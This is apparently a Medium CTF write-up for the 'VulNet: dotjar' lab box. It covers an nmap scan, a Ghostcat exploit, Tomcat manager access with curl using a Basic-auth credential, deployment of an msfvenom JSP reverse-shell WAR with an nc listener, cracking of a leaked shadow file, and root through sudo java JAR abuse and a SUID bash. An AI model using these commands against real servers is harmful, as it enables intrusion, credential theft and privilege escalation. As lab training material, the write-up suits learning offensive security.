VulNet: dotjar

Scanning the box and Initial recon

First we need to discover what services are running and what ports are open. For that we can use nmap Aggressive scanning, that scans the first 1000 ports, scans for OS and service versions and performs a default script scan on the open ports

Result of the aggressive port scanning

Exploiting the vulnerability

Let’s fire up metasploit and we can find that auxiliary/admin/http/tomcat_ghostcat as a Ghostcat exploit. Let’s load it up

Credentials and exploits from the ghostcat exploit
  • /manager/text: A text based interface for Tomcat manager. Used curl --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" http://10.10.23.194:8080/manager/text/list and voila we get the list of application.

Gaining shell

Now that I’ve access to the manager interface, let’s upload and deploy a reverse shell application. First let’s open a listener using nc -lvvp 4444. This will recieve the reverse shell connection. Now, we can use msfvenom to generate the WAR file using

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your tun0 IP> LPORT=4444 -f war -o reverse.war`.
curl --upload-file reverse.war --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" "http://10.10.23.194:8080/manager/text/deploy?path=/reverse"
curl --header "Authorization: Basic d2ViZGV2OkhnajNMQSQwMkQkRmFAMjE=" http://10.10.23.194:8080/manager/text/list

Horizontal Privilege Escalation and User flag

Now that I have a shell on the box, let’s see the user and the permission I’ve on the box.

Spawning the initial shell on the target
Hidden backup found by LinPEAS
Leaked backup of /etc/shadow file
Recovering the password using hashcat
Horizontal escalation to the jdk-admin user

Gaining root access using Java

For this there are many way to get the root flag. Following are the methods I tried

Root reverse shell

To use this method first create a directory structure that matches the class name of the file. I choose com/reverse/command/Main.java. The compiled the class using javac com/reverse/command/Main.java. Since the sudo permission is only for JAR files, I created one using jar cfe Reverse.jar com.reverse.command.Main com/reverse/command/Main.class And by that we have the exploit jar file. Run it as sudo /usr/bin/java -jar Reverse.jar. This would read out the entire root flag for us.

Changing shell’s permission

This method is similar to the method described above with the difference being that I’m making the /bin/bash file a SUID binary. The JAR creation is exactly same and running the exploit is same too. The exploit code is given here

Running the SUID exploit code and checking if ran successfully or not
Running the SUID enabled bash executable to elevate permissions to root

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store